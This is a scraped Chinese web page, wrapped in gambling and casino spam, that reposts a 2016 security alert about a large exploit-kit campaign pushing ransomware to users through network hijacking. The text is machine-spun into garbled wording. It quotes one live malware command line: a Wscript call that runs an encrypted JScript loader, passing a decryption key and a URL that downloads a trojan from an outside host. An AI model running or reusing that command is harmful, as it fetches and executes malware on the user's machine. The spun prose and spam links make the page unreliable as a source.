北京赛车:挂马风险预警:再现大规模挂马攻击

2016-08-27 14:09 出处:未知
分享给小伙伴们:

本年7月,爱拍网等海内知名网站曾蒙受大规模挂马以致敲诈者病毒鼎力大举流传。克日,360互联网平安中间监测到爱拍网挂马变乱的幕后黑手再一次出招,固然伎俩异常类似,但明显该构造这一次的行动胃口更大——再也不针对某些特定网站停止挂马,而是玩起了收集挟制,招致河南某运营商的8万多用户蒙受歹意推法式的进击。

因为收集挟制其实不针对特定网站,以是这次挂马变乱中,包含IE浏览器、爱奇艺客户端、迅雷、搜狗等在内的任何带有展现网页功效的客户端都存在中招能够。详细挂马行动详见7月中旬的分析报告(http://bobao.360.cn/news/detail/3302.html)。

与此前爱拍网挂马变乱类似,这次利用的也是EK(Exploit kits)黑客进击包完成挂马操纵。从带有歹意代码的Flash动画到下载返来的履行歹意剧本的js代码都与以前的环境出奇的类似,独一有区其余是履行js剧本的命令行参数:

1 2 3 Wscript //B //E:JScript GIF.INJExeCute "gexywoaxor" "http://www.zhongqiulipin.com/svchost.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)"

依据js代码,第二个参数为木马下载地点,第一个参数为解密秘钥。

365bet官网pk10技巧bet体育在线投注北京赛车大发888葡京赌场皇冠投注网址

相关文章

本站内容均收集于互联网如有侵犯您的权利请联系我们及时删除

©2014-2016 www.dnaob.com